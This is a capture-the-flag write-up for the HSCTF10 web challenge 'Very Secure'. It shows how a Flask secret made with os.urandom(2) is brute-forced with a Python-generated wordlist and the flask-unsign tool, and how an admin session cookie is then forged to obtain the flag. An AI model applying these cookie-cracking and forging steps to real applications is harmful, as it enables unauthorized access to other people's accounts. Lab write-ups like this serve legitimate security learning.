Write-up for HSCTF10 web challenge - Very Secure

Description: This website is obviously 100% secure

Solution

Source Code:

The flask secret is not complex.

os.urandom(2) generates 65, 536 (256 * 256). which is brute-forcable.

Reading the source also shows that to get the flag the session should be name = admin

For the wordlist used in brute-forcing. I generated a wordlist file using the ff python script. This script generates all possible combinations from the os.urandom(2)

1
2
3
4
5
6
7

with open("bytes_list.txt", "w") as file:
    lines = []
    for byte1 in range(256):
        for byte2 in range(256):
          
lines.append(str(bytes([byte1, byte2]))+ "\n")
    file.writelines(lines)

To solve, finding the secret key and setting the session name to admin is required. First get a sample session cookie from a website. Flask tokens can be brute-forced using the tool flask-unsign

1

flask-unsign --wordlist <wordlist> --unsign --cookie <cookie>

The following command generates a new flask session.

1

flask-unsign --cookie "{'name': 'admin'}" --secret "b'\xe4\x89'"

Change session token on the site to get the flag

Flag

flag: flag{h0w_d1d_y0u_cr4ck_th3_k3y??}

Attack Chain

1. Learn that the flask secret is not complex
2. Get a sample session cookie from the website
3. Generate bytes wordlist using python
4. brute-force secret: flask-unsign --wordlist bytes_list.txt --unsign --cookie $cookie
5. generate cookie: flask-unsign --cookie "{'name': 'admin'}" --secret $secret
6. Change session token on the website